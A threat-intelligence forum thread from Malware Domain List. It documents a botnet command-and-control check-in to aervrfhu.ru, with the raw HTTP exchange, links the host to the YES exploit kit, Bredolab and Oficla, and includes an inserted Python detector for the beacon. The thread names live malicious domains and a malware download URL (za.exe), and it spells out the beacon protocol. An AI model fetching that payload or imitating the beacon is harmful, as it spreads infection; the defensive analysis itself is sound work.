Malware Domain List
Malware Related => Malicious Domains => Topic started by: eoin.miller on February 25, 2010, 05:23:40 pm
-
Seeing infected hosts reach back out to aervrfhu.ru to check in:
GET /kjflth/bb.php?v=200&id=833711035&b=5541074310&tm=52 HTTP/1.1
User-Agent: Opera\9.64
Host: aervrfhu.ru

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 25 Feb 2010 14:23:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.11
Vary: Accept-Encoding,User-Agent
Content-Length: 37

[info]delay:45|upd:0|backurls:[/info]
This trips several Snort alerts. Additionally, this IP is listed in the MDL with other host names for running the YES exploit kit and Bredolab:
http://www.malwaredomainlist.com/mdl.php?search=193.104.94.45
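As an added example (not part of the original post or of any MDL tooling), the following Python detection logic matches the check-in shape shown in the capture above and parses the [info]...[/info] directive block the C&C returns. The request pattern (bb.php with v/id/b/tm parameters plus the malformed Opera\9.64 User-Agent), the log entry format and all sample entries other than the captured request are assumptions constructed for this illustration.

```python
import re
from urllib.parse import parse_qs

# Shape of the check-in request from the capture:
#   GET /<dir>/bb.php?v=<n>&id=<n>&b=<n>&tm=<n> HTTP/1.1
# (assumption: the directory name varies, bb.php and the four parameters do not)
REQUEST_RE = re.compile(
    r"^GET\s+(?P<path>/(?:\S*?/)?bb\.php)\?(?P<query>\S+)\s+HTTP/1\.[01]$"
)
REQUIRED_PARAMS = {"v", "id", "b", "tm"}

# The odd User-Agent from the capture: a backslash where a browser would send a slash.
BAD_UA = "Opera\\9.64"

# Response body from the capture: [info]key:value|key:value|...[/info]
INFO_RE = re.compile(r"^\[info\](?P<body>.*)\[/info\]$", re.S)


def is_checkin_request(request_line: str, user_agent: str) -> bool:
    """True when the request line has the bb.php beacon shape with all four
    parameters AND the User-Agent is the malformed Opera\\9.64 string.
    Requiring both keeps ordinary bb.php traffic from being flagged."""
    m = REQUEST_RE.match(request_line.strip())
    if not m:
        return False
    params = parse_qs(m.group("query"), keep_blank_values=True)
    if not REQUIRED_PARAMS.issubset(params):
        return False
    return user_agent.strip() == BAD_UA


def parse_info_response(body: str) -> dict:
    """Parse the [info]...[/info] directive block into a dict.
    Integer-looking values become ints; 'backurls' becomes a list of URLs
    (empty in the capture). Raises ValueError on anything else."""
    m = INFO_RE.match(body.strip())
    if not m:
        raise ValueError("not an [info] block")
    directives = {}
    for field in m.group("body").split("|"):
        if not field:
            continue
        key, _, value = field.partition(":")
        if key == "backurls":
            # assumption: multiple backup URLs would be comma-separated
            directives[key] = [u for u in value.split(",") if u]
        elif value.lstrip("-").isdigit():
            directives[key] = int(value)
        else:
            directives[key] = value
    return directives


# Constructed sample log: (host, request line, user agent).
# Only the first entry mirrors the captured request; the rest are made up
# to show what is and is not flagged.
SAMPLE_LOG = [
    ("aervrfhu.ru",
     "GET /kjflth/bb.php?v=200&id=833711035&b=5541074310&tm=52 HTTP/1.1",
     "Opera\\9.64"),
    ("www.example.com",
     "GET /index.php?v=200&id=1 HTTP/1.1",
     "Mozilla/5.0"),
    ("example.org",
     "GET /forum/bb.php?v=1&id=2&b=3&tm=4 HTTP/1.1",
     "Opera/9.64"),   # real Opera UA: beacon shape alone is not enough
]


def scan_log(entries):
    """Return the hosts of every entry that looks like this check-in."""
    return [host for host, req, ua in entries if is_checkin_request(req, ua)]


if __name__ == "__main__":
    print("flagged:", scan_log(SAMPLE_LOG))
    print("directives:", parse_info_response("[info]delay:45|upd:0|backurls:[/info]"))
```

The parsed delay value is the only operational field in the capture; a second beacon roughly 45 seconds after the first, to the same host with the same id, is the behaviour a hunting query would look for once the request shape alone is not conclusive.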
-
This is an Oficla C&C.
Currently downloading a file from:
sys.telesweet.net/forums/download/za.exe
http://www.virustotal.com/analisis/e3b4fa1f2686cced685ce0727276db24ba1ebba8cb88d6b357c80d577f37d6be-1267118926